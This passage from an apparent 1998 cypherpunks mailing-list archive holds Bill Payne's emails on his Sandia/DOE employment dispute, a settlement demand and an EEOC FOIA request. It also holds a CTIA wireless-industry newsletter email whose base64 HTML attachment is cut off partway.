messing with our minds.  Each incident cost us MONEY.

  1) make it publicy awalible on Internet, as sound, transcript in
Germany
  I will search for some fluid in German) and a translation to engish.

Suzy, who sent you the email in Hungarian, BY COINCIDENCE had a message
on our recorder
when I returned from Target with the blank tapes.

I told Suzy about your letter and enclosures.

Suzy is FLUENT IN GERMAN, she told me this morning.

The German translation problem may be solved.  

I am making a copy of the Swiss Radio International broadcast tape for
her at her request.

  2) I will contact Swiss Radio, in order to get as much as possible
verified about
  the tapes authentication.  I would also streangthens the tapes
authentication if I
  have your permission to mentioned that I received it from you.  Is
that OK? 

Absolutely.  

NOTHING IS SECURE ON INTERNET.

And as a result it SURE WORKS well for some applications where
visibility is CRITICAL.  I  attach
a message that went out this morning.  

I read at http://www.aci.net/kalliste/ this morning

      PESHAWAR: Saudi dissident Osama Bin Laden for the first time on
Thursday denied his involvement
      in the August 7 bombings at the US embassies in Kenya and
Tanzania. 

      The 42-year-old Bin Laden contacted this correspondent on
satellite phone at 9:00 pm on Thursday to
      convey his statement through another Islamic leader Dr Ayman
Al-Zawahiri, head of Egyptian Islamic
      Jehad organisation which was held responsible for the murder of
Egypt's president Anwar Sadaat. 

      Following is Bin Laden's message: "Osama Bin Laden calls on the
Ummah to continue Jehad against
      Jews and Americans to liberate their holy places. In the meantime,
he denies any involvement in the
      Nairobi and Dar es Salaam bombings."  ...

      The News International Pakistan, August 21, 1998

US president Bill Clinton claims that Osama Bin Laden WAS INVOLVED.

We all have to decide WHO WE BELIEVE:  Bill Clinton or Osama Bin Laden.

      Barely 45 minutes after Dr Al-Zawahiri's telephonic conversation
with this correspondent, the
      Americans struck and reportedly hit both Khost, where he had held
his press conference in May this
      year, and Jalalabad, where he first took refuge after arriving
from Sudan in May 1996. 

NBC reported this morning that as many as 100 cruise missiles were fired
yesterday. http://www.cdiss.org/devils.htm

---
10:47 AM  first tape finished.  I am making the second tape from the
first so as not to wear-out the
original Buehler sent me.
---

FIRING those cruise missile is SIMPLY GREAT for BUSINESS.  The military
can now write MORE
PURCHASE orders for NEW missiles.

What you are posting at your site is related to TERRORISM.

I accidentally stumbled into this mess at the time of the retaliatory
attack on Libya for the bombing of
the La Belle disco.

NSA employee Tom White told me that NSA regarded former president Ronald
Reagan as the US's
greatest traitor.  Naturally, I had to learn more about why.

So perhaps you might think of tracing terrorist attacks starting with
the La Belle at your site.

My SPECULATION is that after what OUR LEADERS did yesterday you will
HAVE LOT OF MATERIAL to post.

             "Those who cannot remember the past are doomed to repeat
it."    
                              -- George Santyana, 1905 

Thank you so much for the letter.  

And I hope you don't mind my attempted EXACT transcription of the major
portion of your letter COMPLETE with English mistakes.  WE ALL MAKE
MISTAKES.

But intelligent people read-through or correct mistakes.  And move on to
the NEXT MISTAKE.

Several years ago I took a beginning course in Japanese.  Azusa Takegami
was the SWEET instructor.

For part of the final exam students had to GIVE A SPEECH IN JAPANESE.

Takegami and Hisako Yamada had the AUDACITY to videotape each student! 
Talk about embarrassment!

Patty and I were in Zurich last April.  I interviewed at IBM Zurich
forschungslabortorium.

Patty and I were IMPRESSED how well about EVERYONE is Switzerland spoke
English.

Most of the people at IBM are Germans.  

We asked how they learned to speak English so well.

They responded that ALL Germans are REQUIRED TO TAKE 12 years of English
in school!

For probably the same reasons Iranians have NO TROUBLE reading this.

America is adopting a new NATIONAL LANGUAGE.

Yo hablo y entiendo la idoma nacional nueva de los estado unidos.  Mas
or menos. 

NEAT to meet you on the Infobahn.  

I'll get the package with the tape into the mail this afternoon.

Best
bill
11:15 AM


Subject: 
        Settlement AGAIN
  Date: 
        Fri, 21 Aug 1998 07:54:23 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        cfl@mgovg.com, william lewis <" Bill.Lewis"@hq.doe.gov>, tyler przybylek <cprzybylek@doeal.gov>,
        steve dillingham <" Steven.Dillingham"@hq.doe.gov>, sandy schneider 
<Sandra.Schneider@hq.doe.gov>,
        Robert Nordhaus <" Robert.Nordhaus"@hq.doe.gov>, joyce laeser <" jlaeser"@doe.lanl.gov>,
        george breznay <George.Breznay@hq.doe.gov>, ann augustyn <" Ann.Augustyn"@hq.doe.gov>, 
ask.heather@mail.house.gov,
        joe.skeen@mail.house.gov, senator_domenici@domenici.senate.gov, 
senator_bingaman@bingaman.senate.gov
    CC: 
        ted lewis <lewis@nps.navy.mil>, jssob@unm.edu, tom carpenter - halcyon <tomcgap@halcyon.com>, 
guyer@mind.net,
        national employee rights institute <neri@nerinet.org>, marc rotenberg <rotenberg@epic.org>,
        m robert kestenbaum <mrkeste@sandia.gov>, klayman <jwatch@erols.com>, jon brock 
<jbrock@u.washington.edu>, jy@jya.com,
        john gilmore <gnu@toad.com>, "jennifer, Aronld Intrater and ray" <" napa"@tmn.com>, 
JEFFREY.CRATER@em.doe.gov,
        j orlin grabbe <kalliste@aci.net>, grassley <chuck_grassley@grassley.senate.gov>, c paul robinson 
<cprobin@sandia.gov>,
        art morales <armoral@sandia.gov>, softwar@softwar.net, armoral@flash.net


Friday 8/21/98 7:23 AM

DOE lawyers and Charlie Jr

We will be doing a Privacy Act violation/defamation lawsuit soon IF WE
don't get this matter settled.

I lived in the basement apartment in the Luce's home in Walla Walla in
1958-59 during my last year at Whitman college.

http://www.mgovg.com/ethics/index.html

Charlie Jr was REAL SMALL THEN.

I might establish TWO-WAY e-mail contact with Charlie Jr.  

Looks like we might have ANOTHER "happy confluence of interests."       

I think my previous settlement offer

/\/\/\/\

Thursday 6/11/98 7:06 AM  
  
Robert Nordhaus  
Chief Counsel, DOE  
  
Monday May 22, 1994 I wrote  
  
Steve Dillingham, Senior Adjudicator  
Office of Contractor Employee Protection   
Department of Energy  
  
a settlement letter.  
  
  Here are initial non-negotiable portions of any   
  possible settlement agreement:  
  
     1    Back pay with interest from the day I was               
          fired,  
  
     2    Back benefits with interest from the day I              
          was fired,  
  
     3    Recovery of 401K losses, with interest, I and   
          my family  have suffered,  
  
  to the date settlement is complete.  
  
     4    Payment of my salary, with increments, and              
          benefits until I retire at age 65. ...  
  
  As a result of Sandia's and the US Government's   
  irresponsible and unintelligent actions from which I   
  was forced to defend,  I have almost no chance of   
  future employment in my profession or elsewhere.  
  
  Here is a list of my initial negotiable damage   
  payments. ...  
  
 4    Privacy Act violations regarding irrelevant         
      material  about my past employment taken from   
      my personnel security file were broadcast by   
      some Sandians.    
  
  Retired Sandia senior fellow Gustavus Simmons in   
  publications gave the impression that he was somehow   
  involved in my work on data authentication for the   
  seismic portion of the US/USSR Comprehensive Test Ban   
  Treaty (CTBT).  
  
  Simmons was not involved in seismic data authentication   
  work.    
  
  Funds obtained by Sandia for my successful National   
  Security Agency proposal on software voting were used   
  for other purposes.  
  
  My viewgraphs and papers on the CTBT data authenticator   
  were plagiarized by defendants Wright and Sellars for   
  their personal profit.   
  
     5    I feel that I was underpaid for my                      
           contributions to  Sandia and DOE.  A                           
           retroactive adjustment to my salary             
           should be negotiated.  
  
I spoke to my former PhD student Lewis last week.  
http://www.friction-free-economy.com/  
  
Lewis advised in addition to the above point to ask for a minimum of 
$1,000,000 punitive damages.  
  
/\/\/\/\

is  TOO LOW.  

The meter is running, I am advised to continue to say.
http://www.mhpcc.edu/general/john.html       

We are becoming MORE EXPERIENCED at litigation.

http://jya.com/whpfiles.htm

More visible too.

 http://www.jya.com/chrysler98.htm

  Morales and I received our nomination materials in the mail last
  Saturday.  We need to submit required information.

  The Chrysler Award for Innovation in Design, now in its sixth year,
  honors outstanding designers (or design teams).  Winners are chosen
  from across the design disciplines by a judging panel of design
  leaders.  One the selection is made, Chrysler will award $10,000
  to each winner (or winning team) at a ceremony in New York in the
  Fall of 1998.  Award winners will be flown to New York for the 
  Award Ceremony.

Later
bill


Thursday 8/20/98 4:10 PM

Aletha L. Brown 
Inspector General
U.S. Equal Employment Opportunity Commission
POB 18858
Washington, D.C. 20036-8858
202-663-4375
800-849-4230

Dear Inspector General Brown:

Purpose of this letter is to file  Freedom of Information Act and Privacy Act requests.

JUL 15, 1998 I received the attached FOIA response letter from A Jacy Thurmond.

Thurmond's JUL 15 letter and attachments were included in an envelope postmarked WASHINGTON JUL 
23'98 DC.

Included in the envelope were two attached pages labeled COMMENTS.

Final paragraph of the COMMENTS two pages states

  You would have no claim under the Privacy Act for the disclosure of this charge file to the charging party.
  To maintain a suit for a violation of the Privacy Act's prohibition against disclosure, 5 U.S.C.  552(b), a
   plaintiff must prove that the information disclosed is covered as a "record" contained within a "system of 
   records," as defined in 5 U.S.C  (sic)  552a(a) (4) and (5).  Davis v. Runyon, 142 F.3d 433 (6th Cir.   
  1998):     Quinn v Stone, 978 F2.d 126, 1`31 (3d Cir. 1992).  The Privacy Act defines a "system of records" 
  as  "a  group of any records under control of any agency from which information is retrieved by the name of 
  the  individual or by some identifying . . . particular . . . assigned to the individual."  5 U.S.C  552(a)(a)(5).
  Our charge files are indexed by the name of the charging party.  They are not indexed, an no records are
  therefore retrievable, by the names of third parties mentioned in the charge file.  Under these circumstances,
  third parties mentioned in the charge file cannot invoke the Privacy Act's prohibition on disclosure with n    
  respect to that charge file because the file is not a record retrievable by the their party's name.  See
  Crumpton v United States, 843 F. Supp. 751, 756 (D.D.C. 1994).

Inspector General Brown,  the final paragraph in COMMENTS appears to be a legal opinion written by
some anonymous EEOC lawyer(s).

COMMENTS appears to be an ATTEMPT to convince me that I have no recourse to remedy under the law for 
release of the false and defaming documents seen at http://www.jya.com/snlhit.htm.

Contrary opinion appears on Intenet at http://www.bxa.doc.gov/FOIA/Foiaintro.htm 
http://204.245.136.2/public/APA/REFRNC/PRIVACY.HTM

  Two district courts have gone even further. In Connelly v. Comptroller of the Currency, 673 F. Supp. 1419, 
  1424 (S.D. Tex. 1987), rev'd on other grounds, 876 F.2d 1209 (5th Cir. 1989), the court construed the broad 
  "any record" language contained in 5 U.S.C.  552a(g)(1)(C) to permit a damages action arising from an 
  allegedly inaccurate record that was not incorporated into a system of records. In a subsequent opinion, the 
  court in Connelly went on to find a cause of action under subsections (e)(5)and (g)(1)(C) with regard to 
  records not in a system.

Here are the FACTS surrounding the ATTACHED 11 pages beginning with Sandia National 
Laboratories   director  Michael Robles writing EEOC Director Charles Burtner. 
 
    A  I never saw the documents until Sandia employee Richard Gallegos gave me a copy in 1997.  
    B  Sandia denied that the documents existed.   
    C  The documents contain factually incorrect information.  I did NOTHING WRONG.  I followed all        
         Sandia procedures known to me and obtained all required Sandia approvals.
    D  I was never given an opportunity to defend myself.  http://jya.com/greene.htm  
    E  Neither Sandia nor EEOC had my permission in writing for release  of the information.  

Ms Brown,  under 5 USC 552, the Freedom of Information Act, and 5 USC 552a, the Privacy Act, I request 
access to copies

1  All records, including phone conversation notes and memoranda, relating the creation of the COMMENTS 
document.

2  Name of the person or persons or any documents containing name(s) of person or persons which reveal who 
authored the COMMENTS document.

If all or any part of this request is denied, please cite the specific exemption(s) which you think justifies your 
refusal to release the information and inform me of your agency's administrative appeal procedures available to 
me under the law.

I would appreciate your handling this request as quickly as possible, and I look forward to hearing from you 
within 20 working days, as the law stipulates

Sincerely,  
  
  
  
William H. Payne   
13015 Calle de Sandias   
Albuquerque, NM 87111   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 21 Aug 1998 12:19:44 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 21, 1998
Message-ID: <199808211816.NAA24657@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3995.1071713795.multipart/mixed"

--Boundary..3995.1071713795.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/       for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 




--Boundary..3995.1071713795.multipart/mixed
Content-Type: application/octet-stream; name="bin00007.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00007.bin"
Content-Description: "_CTIA_Daily_News_19980821.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOzxDRU5URVI+CjxUQUJMRSBCT1JERVI9
MCBDT0xTPTIgV0lEVEg9IjYwMCIgPgo8VFI+CjxURD48QSBIUkVGPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tIj48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ct
Y29tLmNvbS9pbWFnZXMvaG9tZWhlZF90ZXN0LmdpZiIgQUxUPSJXT1ctQ09N
LkNPTSIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD04OSBXSURUSD0yNzU+PC9B
PjwvVEQ+Cgo8VEQ+CjxDRU5URVI+PEEgSFJFRj0iaHR0cDovL3d3dy53aXJl
bGVzc2l0LmNvbSI+PElNRyBTUkM9Imh0dHA6Ly93d3cud293LWNvbS5jb20v
aW1hZ2VzL2FydGRyb3AvMHdpcmVsZXNzaXQuZ2lmIiBBTFQ9IlRvZGF5J3Mg
TmV3cyBTcG9uc29yZWQgYnkgV0lSRUxFU1MgSS5ULiA5OCIgTk9TQVZFIEJP
UkRFUj0wIEhFSUdIVD02MCBXSURUSD0yMzQ+PC9BPjwvQ0VOVEVSPgo8L1RE
Pgo8L1RSPgo8L1RBQkxFPgombmJzcDsKPFRBQkxFIEJPUkRFUj0wIFdJRFRI
PSI2MDAiID4KPFRSIEJHQ09MT1I9IiMwMDAwOTkiPgo8VEQ+PC9URD4KCjxU
RD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIENPTE9S
PSIjQ0NDQ0NDIj48Rk9OVCBTSVpFPSsxPkNUSUEKRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00gLSBBdWd1c3QgMjEsIDE5OTg8L0ZPTlQ+PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD4KPEhSIFdJRFRIPSI1ODAiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPkNlbGx1bGFyIE9uZSBHcm91cCBhbmQK
UXVhbnR1bSBDb21tdW5pY2F0aW9ucyBHcm91cCZuYnNwOzxCUj4KVGVhbSBV
cCB0byBPZmZlciB0aGUgIkludGVybmV0IGJ5IENlbGx1bGFyIE9uZSI8L0ZP
TlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGhl
IGFncmVlbWVudCB3aWxsIGVuYWJsZSBDZWxsdWxhciBPbmUKY2FycmllcnMg
aW4gbmVhcmx5IDQwMCBtYXJrZXRzIHRvIG9mZmVyIHRoZWlyIG5ldyBhbmQg
ZXhpc3Rpbmcgd2lyZWxlc3MKY3VzdG9tZXJzIGEgZnVsbCByYW5nZSBvZiBJ
bnRlcm5ldCBhY2Nlc3MsIHdlYiBzaXRlIGRlc2lnbiBhbmQgaG9zdGluZwpz
ZXJ2aWNlcy4mbmJzcDsgVGhlIGFncmVlbWVudCBwYXZlcyB0aGUgd2F5IGZv
ciB0aGUgbmF0aW9uYWwgaW50cm9kdWN0aW9uCm9mICJJbnRlcm5ldCBieSBD
ZWxsdWxhciBPbmUsIiBmdWxsIEludGVybmV0IGNvbm5lY3Rpb24gc2Vydmlj
ZXMgdW5kZXIKdGhlIENlbGx1bGFyIE9uZSBicmFuZC4gKDxBIEhSRUY9Imh0
dHA6Ly93d3cud293LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3
cy9mcmFtZWluZGV4LmNmbT9hcnRpY2xlaWQ9MzI2OCI+V09XLUNPTTwvQT4p
PC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PC9CUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZP
TlQgU0laRT0rMT5KYXBhbiBUZWxlY29tLCBOaXNzYW4sCkFpclRvdWNoIHRv
IFNldCBVcCBNb2JpbGUgUGhvbmUgVmVudHVyZTwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5UaGUgY29tcGFuaWVzIHBs
YW4gdG8gZm9ybSBhIGpvaW50IHZlbnR1cmUKbmV4dCBtb250aCB0byBzZXQg
dXAgYSBtb2JpbGUgcGhvbmUgc2VydmljZSBiYXNlZCBvbiB0aGUgcHJvcG9z
ZWQgVy1DRE1BCih3aWRlLWJhbmQgY29kZSBkaXZpc2lvbiBtdWx0aXBsZSBh
Y2Nlc3MpIGZvcm1hdC4gKDxBIEhSRUY9Imh0dHA6Ly93d3cubmlra2VpLmNv
LmpwL2VuZXdzL1ROS1MvcGFnZS9IaWdoLVRlY2guaHRtbCNnZW4xNDAiPk5J
S0tFSQpORVQ8L0E+KSAtICg8QSBIUkVGPSJodHRwOi8vYml6LnlhaG9vLmNv
bS9maW5hbmNlLzk4MDgyMS9qYXBhbl90ZWxlXzEuaHRtbCI+WUFIT088L0E+
KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjwvQlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxG
T05UIFNJWkU9KzE+V2lyZWxlc3MgQ2h1cm4gQW1vbmcKVS5TLiBNb2JpbGUg
RmFtaWx5IFN1YnNjcmliZXJzJm5ic3A7PEJSPgp0byBDb3N0IE9wZXJhdG9y
cyBOZWFybHkgJDQgQmlsbGlvbiwgU2F5cyBTdHJhdGVneSBBbmFseXRpY3M8
L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+
SW4gYSBuZXcgcmVwb3J0LCByZXNlYXJjaCBmaXJtLCBTdHJhdGVneQpBbmFs
eXRpY3Mgc2F5cyAzOCUgb2YgbW9iaWxlIGZhbWlseSBzdWJzY3JpYmVycyBh
cmUgYXQgcmlzayBmb3IgY2h1cm4gb3Zlcgp0aGUgbmV4dCAxMiBtb250aHMs
IHJlcHJlc2VudGluZyBwb3RlbnRpYWwgcmV2ZW51ZSBkaXNwbGFjZW1lbnQg
b2YgbmVhcmx5CiQ0IEJpbGxpb24gZm9yIHRoZSBVLlMuIENlbGx1bGFyL1BD
UyBpbmR1c3RyeS4gTW9iaWxlIGZhbWlseSBzdWJzY3JpYmVycwpjaXRlZCBw
b29yIGN1c3RvbWVyIHNlcnZpY2UgYXMgYSByZWFzb24gZm9yIGNodXJuIHR3
aWNlIGFzIG9mdGVuIGFzIGF2ZXJhZ2UKc3Vic2NyaWJlcnMgZGlkLCB0aGUg
cmVwb3J0IHNheXMuICg8QSBIUkVGPSJodHRwOi8vYml6LnlhaG9vLmNvbS9w
cm5ld3MvOTgwODIxL21hX3N0cmF0ZWdfMi5odG1sIj5ZQUhPTzwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PC9CUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQg
U0laRT0rMT5Qb3dlciBJbnRlZ3JhdGlvbnMgU3VlcwpNb3Rvcm9sYSBpbiBQ
YXRlbnQgRGlzcHV0ZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj5Qb3dlciBJbnRlZ3JhdGlvbnMgSW5jLiBoYXMgc3Vl
ZCBNb3Rvcm9sYQpJbmMuIGZvciBhbGxlZ2VkIGluZnJpbmdlbWVudCBvZiB0
d28gcGF0ZW50cyByZWxhdGVkIHRvIGludGVncmF0ZWQgY2lyY3VpdApkZXZp
Y2VzIHVzZWQgaW4gY2VsbHVsYXIgdGVsZXBob25lcyBhbmQgY29tcHV0ZXJz
LiZuYnNwOyAoPEEgSFJFRj0iaHR0cDovL2Jpei55YWhvby5jb20vZmluYW5j
ZS85ODA4MjEvcG93ZXJfaW50ZV8yLmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
L0JSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPkNhbGlmb3JuaWEgTWljcm93YXZlCkFjcXVpcmVzIEFkYXB0aXZlIEJy
b2FkYmFuZDwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj5VLksuLWJhc2VkIEFkYXB0aXZlIEJyb2FkYmFuZCBjb21iaW5l
cwpURE1BIGFuZCBBVE0gdGVjaG5vbG9naWVzIHRvIG1hbmFnZSBiYW5kd2lk
dGggaW4gYW4gZWZmaWNpZW50IHdheSwgd2hpY2gKY2FuIHNpbXVsdGFuZW91
c2x5IHN1cHBvcnQgYWxsIHR5cGVzIG9mIG11bHRpbWVkaWEgdHJhZmZpYzog
SW50ZXJuZXQsIHJlYWwtdGltZQp2aWRlbywgdm9pY2UgYW5kIG90aGVyIGRh
dGEuIENhbGlmb3JuaWEgTWljcm93YXZlIHdpbGwgYWRvcHQgQWRhcHRpdmUn
cwp0ZWNobm9sb2d5IHRvIGV4dGVuZCBpdHMgVGVycmVzdHJpYWwgV2lyZWxl
c3MgRGl2aXNpb24ncyBjdXJyZW50IG5hcnJvd2JhbmQKcmFkaW8gcHJvZHVj
dHMgdG8gaGlnaGVyIGRhdGEgcmF0ZXMsIGFuZCBmcm9tIG11bHRpcGxlLWFk
ZHJlc3MgdG8gcG9pbnQtdG8tbXVsdGlwb2ludAphcHBsaWNhdGlvbnMuICg8
QSBIUkVGPSJodHRwOi8vYml6LnlhaG9vLmNvbS9idy85ODA4MjAvY2FsaWZv
cm5pYV8xLmh0bWwiPllBSE9PPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1RE
Pgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48L0JSPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPldhbGwgU3RyZWV0
IFZpZXdzIExNRFMKQ2F1dGlvdXNseTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5XaGlsZSBiaWdnZXIgTE1EUyBsaWNl
bnNlIGhvbGRlcnMnIHBsYW5zCmZvciBMTURTIHNwZWN0cnVtIGFyZSBub3Qg
ZXNzZW50aWFsIHRoZWlyIGNvcnBvcmF0ZSBzdHJhdGVnaWVzIG9yIGVhcm5p
bmdzLApzdGFydC11cCBwdWJsaWMgY29tcGFuaWVzLS1zdWNoIGFzIENlbGx1
bGFyVmlzaW9uIFVTQSwgVGVsaWdlbnQsIGFuZCBXaW5TdGFyCkNvbW11bmlj
YXRpb25zLS1yZWx5IHdob2xseSBvbiB0aGVpciBMTURTIGNvbW1lcmNpYWwg
c3BlY3RydW0gb3BlcmF0aW9ucy4KKDxBIEhSRUY9Imh0dHA6Ly93d3cud293
LWNvbS5jb20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWluZGV4
LmNmbT9hcnRpY2xlaWQ9MzI3MyI+V09XLUNPTTwvQT4pPC9GT05UPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PC9CUj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5E
aWdpdGFsIFdpcmVsZXNzIEFwcGxpY2F0aW9ucwp0byBIZWxwIERyaXZlJm5i
c3A7PEJSPgpEaWdpdGFsIFNpZ25hbCBQcm9jZXNzb3IgR3Jvd3RoPC9GT05U
PjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkEgbmV3
IHJlcG9ydCBmb3JlY2FzdHMgMzIgcGVyY2VudCBncm93dGgKZm9yIHByb2dy
YW1tYWJsZSBEU1AgY2hpcHMgaW4gMTk5OSBhbmQgYSAzMyBwZXJjZW50IGNv
bXBvdW5kIGFubnVhbCBncm93dGgKcmF0ZSB0byAyMDAyLCB3aGVuIHRoZSBw
cm9ncmFtbWFibGUgRFNQIG1hcmtldCBpcyBleHBlY3RlZCB0byByZWFjaCAk
MTMuNApiaWxsaW9uLiZuYnNwOyBUaGUgZ3Jvd3RoIHdpbGwgYmUgZnVlbGVk
IGJ5IG5ldyBhcHBsaWNhdGlvbnMgaW5jbHVkaW5nCnNhdGVsbGl0ZSBwaG9u
ZXMgYW5kIHNtYXJ0IGFudGVubmFzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy50
ZWNod2ViLmNvbS93aXJlL3N0b3J5L1RXQjE5OTgwODIwUzAwMDQiPlRFQ0hX
RUI8L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxU
RD48L1REPgoKPFREPjwvQlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPjxGT05UIFNJWkU9KzE+V2lsbCBEb3duc2l6aW5nIHRoZSBQaG9uZXMK
QWxsb3cgTmV4dGVsIHRvIE1vdmUgVXBtYXJrZXQ/PC9GT05UPjwvRk9OVD48
L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPk5leHRlbCBDb21tdW5p
Y2F0aW9ucywgaW4gYSBtb3ZlIHRvIGF0dHJhY3QKbW9yZSBwcm9mZXNzaW9u
YWxzLCBoYXMgaW50cm9kdWNlZCBhIHBhbG0tc2l6ZWQgaGFuZHNldCBjYWxs
ZWQgdGhlIGkxMDAwCmRlc2lnbmVkIGJ5IE1vdG9yb2xhLiAoPEEgSFJFRj0i
aHR0cDovL3d3dy53b3ctY29tLmNvbS9yZXN1bHRzL3Byb2Zlc3Npb25hbC9u
ZXdzL2ZyYW1laW5kZXguY2ZtP2FydGljbGVpZD0zMjc1Ij5XT1ctQ09NPC9B
Pik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48L0JSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPSsxPkRlbnZlciBUZXN0aW5nIFNhdGVsbGl0ZS1Bc3Npc3Rl
ZApDZWxsIFBob25lczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9U
